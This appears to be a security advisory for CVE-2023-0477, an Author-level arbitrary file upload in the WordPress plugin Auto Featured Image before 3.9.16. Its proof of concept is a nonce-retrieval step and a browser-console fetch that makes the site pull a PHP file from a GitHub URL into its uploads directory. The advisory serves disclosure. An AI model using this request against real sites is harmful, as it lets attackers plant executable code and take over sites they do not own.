Auto Featured Image < 3.9.16 – Author+ Arbitrary File Upload | CVE 2023-0477

Description

The plugin includes an AJAX endpoint that allows any user with at least Author privileges to upload arbitrary files, such as PHP files. This is caused by incorrect file extension validation.

Proof of Concept

1. In Auto Featured Image > Settings, fill in the fields "API key for Google" and "Google Custom Search Engine ID". The values do not matter as long as they are not empty.
2. As an Author, add an Image block to a post. Click on the block's "Media Library" button, and click on the "Auto Featured Image" tab.
3. In the browser console's Elements tab, search for `apt_api_google` to retrieve the required nonce:

```
findImages('google', 'apt_api_google', 'NONCE', query, page, {
	rights: jQuery("#filter_rights").attr('checked') === 'checked' ? 1 : 0,
});
```

4. Run the following JS code in the browser console, inserting the nonce which was retrieved in the previous step.

```
fetch(
    'admin-ajax.php',
    {
        method: 'POST',
        headers: {
            'Content-Type': 'application/x-www-form-urlencoded'
        },
        body: 'action=upload_to_library' + 
            '&wpnonce=' + 'NONCE' +
            '&is_upload=1' + 
            '&service=unsplash' +
            '&image_url=' + encodeURIComponent( 'https://raw.githubusercontent.com/Sonnto/HTTP-5212-echo-php/main/echo.php?fm=php'  )
    }
);
```

5. See that the PHP file has been added in the `uploads` directory on the site.